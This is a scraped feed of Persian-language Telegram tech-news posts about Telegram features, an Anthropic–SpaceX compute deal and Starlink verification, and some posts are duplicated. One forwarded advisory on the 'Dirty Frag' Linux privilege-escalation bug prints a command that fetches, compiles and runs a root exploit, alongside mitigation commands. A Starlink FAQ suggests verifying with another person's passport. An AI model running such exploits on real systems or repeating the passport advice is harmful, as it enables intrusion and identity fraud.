در اقدامی عجیب، شرکت انتروپیک با SpaceX (مالک xAI) وارد همکاری شده تا بتونه ظرفیت محاسباتی خودش رو افزایش بده.
ایلان ماسک در گذشته یکی از مخالفان انتروپیک بوده ولی اخیرا در ملاقاتی با اعضای ارشد این شرکت گفته که اونها افراد بسیار توانمندی هستن و به انجام کار عمیقا اهمیت میدن و تحت تأثیر اونها قرار گرفته. در نتیجه دیگه مشکلی با همکاری با اونها نداره.
با این همکاری، انتروپیک به کل ظرفیت محاسباتی دیتاسنتر Colossus 1 شرکت SpaceX که شامل بیش از ۲۲۰ هزار چیپ هوش مصنوعی انویدیا هست و ۳۰۰ مگاوات توان داره، دسترسی خواهد داشت.
این ظرفیت محاسباتی جدید مستقیما روی کاربران هوش مصنوعی Claude تأثیر خواهد گذاشت و انتروپیک اعلام کرده که از امروز امکان استفاده از ابزار کدنویسی محبوب Claude Code در اشتراکها و API این شرکت در بازههای ۵ ساعته، دو برابر افزایش پیدا کرده و محدودیت استفاده از اونها در ساعتهای پیک هم برداشته شده.
این شرکت همچنین نسبت به استفاده از بقیه ظرفیت محاسباتی SpaceX و همچنین دیتاسنترهای فضایی در آینده ابراز علاقه کرده.
🔎 cnbc
📍 @TechTube
ایلان ماسک در گذشته یکی از مخالفان انتروپیک بوده ولی اخیرا در ملاقاتی با اعضای ارشد این شرکت گفته که اونها افراد بسیار توانمندی هستن و به انجام کار عمیقا اهمیت میدن و تحت تأثیر اونها قرار گرفته. در نتیجه دیگه مشکلی با همکاری با اونها نداره.
با این همکاری، انتروپیک به کل ظرفیت محاسباتی دیتاسنتر Colossus 1 شرکت SpaceX که شامل بیش از ۲۲۰ هزار چیپ هوش مصنوعی انویدیا هست و ۳۰۰ مگاوات توان داره، دسترسی خواهد داشت.
این ظرفیت محاسباتی جدید مستقیما روی کاربران هوش مصنوعی Claude تأثیر خواهد گذاشت و انتروپیک اعلام کرده که از امروز امکان استفاده از ابزار کدنویسی محبوب Claude Code در اشتراکها و API این شرکت در بازههای ۵ ساعته، دو برابر افزایش پیدا کرده و محدودیت استفاده از اونها در ساعتهای پیک هم برداشته شده.
این شرکت همچنین نسبت به استفاده از بقیه ظرفیت محاسباتی SpaceX و همچنین دیتاسنترهای فضایی در آینده ابراز علاقه کرده.
🔎 cnbc
📍 @TechTube
🔥35👏4❤🔥2🌭2
تلگرام بهبود قابلیت نظرسنجی رو ادامه داده و در آپدیت جدید ۱۲/۷ امکان محدود کردن نظرسنجیهارو اضافه کرده که امکان تقلب و رأی دادن فلهای توسط باتهارو به طور قابل توجهی کاهش میده.
در این آپدیت امکان محدود کردن نظرسنجی به اعضای فعلی کانال ممکن شده. همچنین میشه نظرسنجی رو به کاربران کشورهای خاصی محدود کرد تا فقط اون کاربران بتونن رأی بدن.
علاوه بر این امکان مشاهده آمار نظرسنجی هم اضافه شده که میزان رأی به هر گزینه رو به مرور زمان نشون میده. بخش آمار برای هر نظرسنجی بعد از دریافت ۱۰۰ رأی اول فعال میشه.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
در این آپدیت امکان محدود کردن نظرسنجی به اعضای فعلی کانال ممکن شده. همچنین میشه نظرسنجی رو به کاربران کشورهای خاصی محدود کرد تا فقط اون کاربران بتونن رأی بدن.
علاوه بر این امکان مشاهده آمار نظرسنجی هم اضافه شده که میزان رأی به هر گزینه رو به مرور زمان نشون میده. بخش آمار برای هر نظرسنجی بعد از دریافت ۱۰۰ رأی اول فعال میشه.
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥45🌭2💔2
از چه طریقی به تلگرام وصل شدین؟
Final Results
2%
سیمکارت سفید
10%
اینترنت پرو
66%
کانفیگهای پولی
21%
روشهای رایگان
🤔31🗿18⚡13🤣9🌭7🍌3❤🔥2👏1🤬1
تلگرام بالأخره با باتهایی که از ریاکشنها در بخش کامنتها سوءاستفاده میکنن (عمدتا باتهای پورن)، مقابله کرده و در آپدیت جدیدش امکان حذف ریاکشنهای یک کاربر از تمامی پیامهارو اضافه کرده.
تا پیش از این راهی برای مقابله با این باتها نبود و حتی اگر این باتها بن هم میشدن، ریاکشن اونها روی پیامها باقی میموند. ولی حالا امکان حذف تمامی ریاکشنهای درج شده توسط یک اکانت هم مهیا شده.
علاوه بر این دسترسی ارسال ریاکشن در گروهها هم اضافه شده و ادمینها حالا این اختیار رو دارن که امکان درج ریاکشن روی پیامهارو برای همه اعضای گروه یا تنها برای افراد خاصی محدود کنن.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
تا پیش از این راهی برای مقابله با این باتها نبود و حتی اگر این باتها بن هم میشدن، ریاکشن اونها روی پیامها باقی میموند. ولی حالا امکان حذف تمامی ریاکشنهای درج شده توسط یک اکانت هم مهیا شده.
علاوه بر این دسترسی ارسال ریاکشن در گروهها هم اضافه شده و ادمینها حالا این اختیار رو دارن که امکان درج ریاکشن روی پیامهارو برای همه اعضای گروه یا تنها برای افراد خاصی محدود کنن.
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥66💊7🌭1
This media is not supported in your browser
VIEW IN TELEGRAM
تلگرام از قابلیت جدیدی برای باتها به نام Guest Bots یا "باتهای مهمان" رونمایی کرده که اجازه میده از باتها در گروهها و چتهای شخصی بدون نیاز به اضافه کردن اونها یا دادن دسترسی به همه پیامها استفاده کرد که برای باتهایی مثل باتهای هوش مصنوعی میتونه کاربردی باشه.
برای استفاده از این قابلیت باید سازنده این حالت رو در BotFather فعال کرده باشه، بعد از اون مشابه باتهای Inline، با قرار دادن آیدی بات در ابتدای پیام میتونین از این حالت استفاده کنین.
یکی از تفاوتهای مهم بین Guest Bots و Inline Mode این هست که در حالت Inline بات از محتوای پیامی که بهش ریپلای زدین خبردار نمیشه ولی Guest Bot میتونه محتوای پیام ریپلای شده رو هم ببینه و در جواب اون رو لحاظ کنه. مثلا میتونین روی یک پیام ریپلای کنین و بنویسین:
و بات موردنظر میتونه با دیدن پیام ریپلای شده، به اون جواب بده.
علاوه بر این در حالت اینلاین، نام شما روی پیام بات قرار داده میشه، ولی Guest Bot پیام مستقل با نام خودش میفرسته.
همچنین در هر پیام میتونین به طور همزمان ۳ عدد Guest Bot رو منشن کنید تا هر سهتای اونها به طور جداگانه یا با کمک همدیگه جوابتون رو بدن.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
برای استفاده از این قابلیت باید سازنده این حالت رو در BotFather فعال کرده باشه، بعد از اون مشابه باتهای Inline، با قرار دادن آیدی بات در ابتدای پیام میتونین از این حالت استفاده کنین.
یکی از تفاوتهای مهم بین Guest Bots و Inline Mode این هست که در حالت Inline بات از محتوای پیامی که بهش ریپلای زدین خبردار نمیشه ولی Guest Bot میتونه محتوای پیام ریپلای شده رو هم ببینه و در جواب اون رو لحاظ کنه. مثلا میتونین روی یک پیام ریپلای کنین و بنویسین:
@GrokAI is this true?
و بات موردنظر میتونه با دیدن پیام ریپلای شده، به اون جواب بده.
علاوه بر این در حالت اینلاین، نام شما روی پیام بات قرار داده میشه، ولی Guest Bot پیام مستقل با نام خودش میفرسته.
همچنین در هر پیام میتونین به طور همزمان ۳ عدد Guest Bot رو منشن کنید تا هر سهتای اونها به طور جداگانه یا با کمک همدیگه جوابتون رو بدن.
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
💯20🔥12❤🔥4🌭2🍌1
This media is not supported in your browser
VIEW IN TELEGRAM
علاوه بر این باتها حالا میتونن پیامهای همدیگه رو ببینن و به اونها واکنش نشون بدن که به خصوص برای باتهای هوش مصنوعی و Agentها میتونه کاربردی باشه.
این قابلیت باید برای هر بات در BotFather فعال بشه و سازنده بات باید اقدامات لازم برای جلوگیری از درگیر شدن در لوپ بینهایت رو لحاظ کنه.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
این قابلیت باید برای هر بات در BotFather فعال بشه و سازنده بات باید اقدامات لازم برای جلوگیری از درگیر شدن در لوپ بینهایت رو لحاظ کنه.
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
👌16🍌9🤣5❤🔥2🌭1
This media is not supported in your browser
VIEW IN TELEGRAM
قابلیت Business Bot که حالا با عنوان Chat Automation شناخته میشه، برای همه کاربران رایگان شده و دیگه نیازی به اشتراک پریمیوم نداره.
این قابلیت، نسخه اصولی باتهای سلف برای کنترل اکانت هست و به کاربران امکان مدیریت هوشمندانه اکانتشون و دادن جوابهای خودکار با هوش مصنوعی به پیامهای دریافتی رو میده.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
این قابلیت، نسخه اصولی باتهای سلف برای کنترل اکانت هست و به کاربران امکان مدیریت هوشمندانه اکانتشون و دادن جوابهای خودکار با هوش مصنوعی به پیامهای دریافتی رو میده.
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥22🌭2🤝2
This media is not supported in your browser
VIEW IN TELEGRAM
در آپدیت قبلی تلگرام امکان تغییر و اصلاح متن با استایلهای مختلف از طریق هوش مصنوعی اضافه شد ولی این استایلها تا پیش از این ثابت بودن. اما حالا تلگرام امکان اضافه کردن استایلهای سفارشی رو ممکن کرده.
با این قابلیت کاربران با ساخت استایل جدید میتونن دستور مدنظرشون برای ویرایش یا اصلاح متن رو وارد کنن و هوش مصنوعی تلگرام براساس اون اقدام به تغییر متن ورودی کاربر میکنه.
این استایلها قابلیت اشتراکگذاری دارن و میشه از طریق لینک اونها رو برای بقیه کاربران فرستاد.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
با این قابلیت کاربران با ساخت استایل جدید میتونن دستور مدنظرشون برای ویرایش یا اصلاح متن رو وارد کنن و هوش مصنوعی تلگرام براساس اون اقدام به تغییر متن ورودی کاربر میکنه.
این استایلها قابلیت اشتراکگذاری دارن و میشه از طریق لینک اونها رو برای بقیه کاربران فرستاد.
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚16⚡3
This media is not supported in your browser
VIEW IN TELEGRAM
تلگرام قابلیت جستجوی استیکر و اموجیها از طریق کلیدواژههارو بهبود داده و حالا بیش از ۱۰۰ میلیون استیکر و اموجی توسط هوش مصنوعی تلگرام اسکن شدن تا با ۳۶ زبان قابل جستجو باشن.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥23🔥7
نکتهای که در آپدیت قبلی تلگرام فراموش شد که به اون اشاره بشه، تغییری در نحوه فوروارد کردن موزیکها هست که حالا مثل بقیه پیامها، تلگرام در اندروید و دسکتاپ مبدأ اون موزیک رو هم نشون میده.
بنابراین در هنگام فوروارد کردن موزیکها، حواستون باشه که اگر مایل نیستین مبدأ اون موزیک (چه شخص و چه کانال) مشخص بشه، گزینه Hide Sender Name رو برای اون موزیک در هنگام فوروارد فعال کنید.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
بنابراین در هنگام فوروارد کردن موزیکها، حواستون باشه که اگر مایل نیستین مبدأ اون موزیک (چه شخص و چه کانال) مشخص بشه، گزینه Hide Sender Name رو برای اون موزیک در هنگام فوروارد فعال کنید.
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥52🌭7
در آپدیت جدید تلگرام برای اندروید همچنین امکان نمایش و رندر کردن فایلهای با قالب بندی Markdown (با پسوند md) مستقیما در تلگرام هم اضافه شده که به خصوص برای برنامهنویسها و مشاهده راهنمای استفاده از مخازن گیتهاب میتونه مفید باشه.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥35👏5⚡3👌2
AzuDL_readme.md
12.4 KB
❤🔥22
Forwarded from NasNet | استارلینک برای ایران
احراز هویت اکانتهای استارلینک
استارلینک شروع به درخواست احراز هویت از کاربرانی کرده که سرویس فعال دارند.
📣 این موضوع شامل کاربران سرویس رایگان نمیشود.
کاربران ایرانی در این موضوع تنها نیستند، این اتفاق برای عراق، کنیا و چند کشور دیگر هم افتاده و به نظر میرسد از این به بعد بخشی از روند معمول اکانتهای Roam خارج از کشور محل فعالسازی سرویس خواهد بود.
مدارک و ابزار مورد نیاز برای احراز هویت:
۱. پاسپورت
۲. گوشی با دوربین (برای عکس سلفی)
❕ نام اکانت استارلینک باید با نام روی پاسپورت یکی باشد.
اگر یکی نیست، از این روش برای ساخت اکانت با نام واقعی استفاده کنید.
آموزش
📌 فرم احراز هویت، موارد الزامی:
نام کامل (مطابق پاسپورت)
ملیت (مطابق پاسپورت)
تاریخ تولد (مطابق پاسپورت)
شماره پاسپورت
تصویر واضح از صفحه اول پاسپورت
عکس سلفی
❔ سوالات متداول:
س: آیا ایرانی بودن در آینده مشکلی ایجاد خواهد کرد؟
ج: تا امروز مشکل جدیای ایجاد نشده. امیدواریم در آینده هم نشود.
س: پاسپورت ندارم، چه کار کنم؟
ج: میتوانید از پاسپورت شخص دیگری استفاده کنید.
س: آیا ارسال اطلاعات پاسپورت از نظر امنیتی مشکلی ندارد؟
ج: استارلینک امنیت این اطلاعات را جدی میگیرد. در صورت هک شدن احتمالاً هدف هکرها اطلاعات مهمتری از کپی پاسپورت خواهد بود.
سوالات بیجواب (فعلاً):
- چرا بعضی اکانتها نیاز به احراز هویت ندارند؟
- در صورت عدم احراز هویت چه اتفاقی میافتد؟ (با توجه به رایگان بودن سرویس در ایران و عدم نیاز به اکانت)
🖐 هشدار امنیتی مهم:
اگر کسی در پیام خصوصی با شما تماس گرفت و ادعا کرد که میتواند در این فرآیند کمک کند و به خصوص اگر پروفایلش شبیه NasNet یا ادمینهای این گروه بود، جواب ندهید.
اطلاعات شخصی، پاسپورت یا هر مدرک هویتی خود را با هیچ فرد ناشناسی در فضای آنلاین به اشتراک نگذارید. ادمینهای این گروه هرگز از طریق پیام خصوصی چنین درخواستی نخواهند داشت.
➖ ➖ ➖ ➖ ➖ ➖ ➖
🟣 JoinNASNET
🎞 JoinNASNET
🤖 JoinNASNET
💭 JoinNASNET
استارلینک شروع به درخواست احراز هویت از کاربرانی کرده که سرویس فعال دارند.
کاربران ایرانی در این موضوع تنها نیستند، این اتفاق برای عراق، کنیا و چند کشور دیگر هم افتاده و به نظر میرسد از این به بعد بخشی از روند معمول اکانتهای Roam خارج از کشور محل فعالسازی سرویس خواهد بود.
مدارک و ابزار مورد نیاز برای احراز هویت:
۱. پاسپورت
۲. گوشی با دوربین (برای عکس سلفی)
اگر یکی نیست، از این روش برای ساخت اکانت با نام واقعی استفاده کنید.
آموزش
نام کامل (مطابق پاسپورت)
ملیت (مطابق پاسپورت)
تاریخ تولد (مطابق پاسپورت)
شماره پاسپورت
تصویر واضح از صفحه اول پاسپورت
عکس سلفی
❔ سوالات متداول:
س: آیا ایرانی بودن در آینده مشکلی ایجاد خواهد کرد؟
ج: تا امروز مشکل جدیای ایجاد نشده. امیدواریم در آینده هم نشود.
س: پاسپورت ندارم، چه کار کنم؟
ج: میتوانید از پاسپورت شخص دیگری استفاده کنید.
س: آیا ارسال اطلاعات پاسپورت از نظر امنیتی مشکلی ندارد؟
ج: استارلینک امنیت این اطلاعات را جدی میگیرد. در صورت هک شدن احتمالاً هدف هکرها اطلاعات مهمتری از کپی پاسپورت خواهد بود.
سوالات بیجواب (فعلاً):
- چرا بعضی اکانتها نیاز به احراز هویت ندارند؟
- در صورت عدم احراز هویت چه اتفاقی میافتد؟ (با توجه به رایگان بودن سرویس در ایران و عدم نیاز به اکانت)
اگر کسی در پیام خصوصی با شما تماس گرفت و ادعا کرد که میتواند در این فرآیند کمک کند و به خصوص اگر پروفایلش شبیه NasNet یا ادمینهای این گروه بود، جواب ندهید.
اطلاعات شخصی، پاسپورت یا هر مدرک هویتی خود را با هیچ فرد ناشناسی در فضای آنلاین به اشتراک نگذارید. ادمینهای این گروه هرگز از طریق پیام خصوصی چنین درخواستی نخواهند داشت.
Please open Telegram to view this post
VIEW IN TELEGRAM
🤬25⚡6🌭4🫡4🥴3🤣2☃1🌚1💔1😐1
Forwarded from Matin SenPai (᯽マティ️️ン先輩)
هرچه سریعتر اکانت مایکروسافت ویندوزتون رو از مایکروسافت به Local تغییر بدید تا این بلا سرتون نیاد. همینطور علاوه بر پین کد، پسوورد هم تنظیم کنید و راههای دیگهی لاگین.
من دو بار به این مشکل خوردم و متأسفانه تنها راهی که پیش بردم این بود که از طریق Advanced Troubleshooting رفتم و ویندوز رو دوباره نصب کردم(فقط اپهای روی درایو C پاک میشن و بقیه درایوها و همینطور پوشه دانلودهاتون سر جاش میمونن)
اینجا یه ضربهی وحشتناک خوردم و اونم این بودش که مجددا بعد از چند روز قفل شد و روز از نو روزی از نو. که فهمیدم راه حلش اینه:
1- تغییر اکانت مایکروسافت روی ویندوز به Local account
2- حذف پین کد(که بکاپش ایمیل مایکروسافت هست) و اد کردن password یا یه راه لاگین دیگه. بعدش مجددا میتونید پین کد هم اضافه کنید
الان سه هفته اینهاست که به مشکل نخوردم دیگه
من دو بار به این مشکل خوردم و متأسفانه تنها راهی که پیش بردم این بود که از طریق Advanced Troubleshooting رفتم و ویندوز رو دوباره نصب کردم(فقط اپهای روی درایو C پاک میشن و بقیه درایوها و همینطور پوشه دانلودهاتون سر جاش میمونن)
اینجا یه ضربهی وحشتناک خوردم و اونم این بودش که مجددا بعد از چند روز قفل شد و روز از نو روزی از نو. که فهمیدم راه حلش اینه:
1- تغییر اکانت مایکروسافت روی ویندوز به Local account
2- حذف پین کد(که بکاپش ایمیل مایکروسافت هست) و اد کردن password یا یه راه لاگین دیگه. بعدش مجددا میتونید پین کد هم اضافه کنید
الان سه هفته اینهاست که به مشکل نخوردم دیگه
❤🔥24🤣19🤝5🌚4💅2
صاحبان باتهای تلگرامی از حالا میتونن از طریق BotFather دسترسی به باتشون رو تنها به خودشون و افراد مدنظرشون محدود کنن که برای باتهای شخصی و باتهای درون سازمانی کاربردی هست.
تا پیش از این برای این کار نیاز بود که دسترسی افراد در سطح کد محدود بشه ولی حالا با رفتن به وباپ BotFather، وارد شدن به قسمت Bot Settings میشه با فعال کردن قابلیت Restrict bot usage امکان استفاده از بات رو به خودتون و دیگر افرادی که انتخاب میکنید، محدود کنید.
🚀 دیگر قابلیتهای اپدیت جدید تلگرام
📍 @TechTube
تا پیش از این برای این کار نیاز بود که دسترسی افراد در سطح کد محدود بشه ولی حالا با رفتن به وباپ BotFather، وارد شدن به قسمت Bot Settings میشه با فعال کردن قابلیت Restrict bot usage امکان استفاده از بات رو به خودتون و دیگر افرادی که انتخاب میکنید، محدود کنید.
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥40⚡4❤🔥1
Forwarded from gooyban🦆
بازهم آسیبپذیری تمام لینوکسها از ۲۰۱۷: Dirty Frag
آسیبپذیری تازهای در ادامهی Dirty Pipe و Copy Fail پیدا شده، که با ترکیب دو باگ امنیتی (xfrm-ESP و RxRPC در Page Cache) در بسیاری از توزیعها میتونه دسترسی root بگیره.
میتونید روی سیستم خودتون هم امتحانش کنید:
پس از اینکه انجامش دادید، Page Cache شما آلوده شده با اجرای دستور:
یا ریاستارت کردن سیستم به حالت پیش برگردونیدش.
راهکار:
تا پچ امنیتی برای توزیعتون بیاد میتونید با این دستور ماژولهایی که این آسیبپذیری در اونها وجود داره را غیرفعال کنید و Page cache را پاک کنید:
روی این سیستمها تا الان تست شده و آسیبپذیر بودند:
اگه شبیه CopyFail به نظر میاد خودشون گفتن که:
⌨️ توضیحات بیشتر در گیتهاب
تمام این اتفاقها داره در زمانی میوفته که اینترنت ایران همچنان قطعه، سیستمها به روز نشدند، با خبر شدن از این باگها و برطرف کردنشون به مراتب سختتر خواهد بود.
✈️ به این لیست (از کانال سهراب) Dirty Frag را هم اضافه کنید.
🎮 @gooyban
آسیبپذیری تازهای در ادامهی Dirty Pipe و Copy Fail پیدا شده، که با ترکیب دو باگ امنیتی (xfrm-ESP و RxRPC در Page Cache) در بسیاری از توزیعها میتونه دسترسی root بگیره.
میتونید روی سیستم خودتون هم امتحانش کنید:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
پس از اینکه انجامش دادید، Page Cache شما آلوده شده با اجرای دستور:
echo 3 > /proc/sys/vm/drop_caches
یا ریاستارت کردن سیستم به حالت پیش برگردونیدش.
راهکار:
تا پچ امنیتی برای توزیعتون بیاد میتونید با این دستور ماژولهایی که این آسیبپذیری در اونها وجود داره را غیرفعال کنید و Page cache را پاک کنید:
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
روی این سیستمها تا الان تست شده و آسیبپذیر بودند:
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
اگه شبیه CopyFail به نظر میاد خودشون گفتن که:
ایده شروع این تحقیق از آسیبپذیری Copy Fail گرفته شده. بهطور مشخص، بخش xfrm-ESP در زنجیره آسیبپذیری Dirty Frag از همان نقطه ضعف مشابه Copy Fail استفاده میکند. اما تفاوت مهم این است که این آسیبپذیری مستقل از وجود ماژول algif_aead فعال میشود.
به عبارت دیگر، حتی اگر روی سیستم راهکار شناختهشده مقابله با Copy Fail (مثل غیرفعال کردن algif_aead) اعمال شده باشد، باز هم لینوکس شما در برابر Dirty Frag آسیبپذیر باقی میماند.
تمام این اتفاقها داره در زمانی میوفته که اینترنت ایران همچنان قطعه، سیستمها به روز نشدند، با خبر شدن از این باگها و برطرف کردنشون به مراتب سختتر خواهد بود.
Please open Telegram to view this post
VIEW IN TELEGRAM
😨19🤬7
تلگرام قمارخونه جدید راه انداخته و به کاربران اجازه میده با تاس انداختن روی پولشون قمار کنن!
پیش نیاز استفاده از این قابلیت داشتن اکانتی با حداقل سطح ۵ و همچنین موجودی به صورت TON هست که میتونید با فرگمنت اکانتتون رو شارژ کنید.
بعد از اون باید در یک چت اموجی تاس رو بفرستین. بعد از ارسال روی اون کلیک کنید و گزینه Change رو انتخاب کنید. در اینجا نحوه کار این قمار مشخص میشه که عدد مدنظرتون که بین ۰/۱ تا ۲۰ تون (۲۶ سنت تا ۵۲ دلار) برای قمار رو وارد میکنید و تاس میندازید.
اگر با تاس عددی بین ۱ تا ۳ دربیارین، به تناسب ضریب اون عدد، از پولی که وارد کردین کم میشه و اگر بین ۴ تا ۶ بیارین، بسته به ضریب عدد روی تاس، به مقدار پولتون اضافه میشه. اگر ۳ بار پشت هم ۶ بیارین، پولتون ۷ برابر میشه.
📍 @TechTube
پیش نیاز استفاده از این قابلیت داشتن اکانتی با حداقل سطح ۵ و همچنین موجودی به صورت TON هست که میتونید با فرگمنت اکانتتون رو شارژ کنید.
بعد از اون باید در یک چت اموجی تاس رو بفرستین. بعد از ارسال روی اون کلیک کنید و گزینه Change رو انتخاب کنید. در اینجا نحوه کار این قمار مشخص میشه که عدد مدنظرتون که بین ۰/۱ تا ۲۰ تون (۲۶ سنت تا ۵۲ دلار) برای قمار رو وارد میکنید و تاس میندازید.
اگر با تاس عددی بین ۱ تا ۳ دربیارین، به تناسب ضریب اون عدد، از پولی که وارد کردین کم میشه و اگر بین ۴ تا ۶ بیارین، بسته به ضریب عدد روی تاس، به مقدار پولتون اضافه میشه. اگر ۳ بار پشت هم ۶ بیارین، پولتون ۷ برابر میشه.
⚠️ قمار در اکثر موارد ضرره، بنابراین بعد از بازی کردن احتمال زیاد پولتون رو از دست میدین.
📍 @TechTube
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🌭132🤣80🤬15👏13🍌8🔥5👌5😍1😡1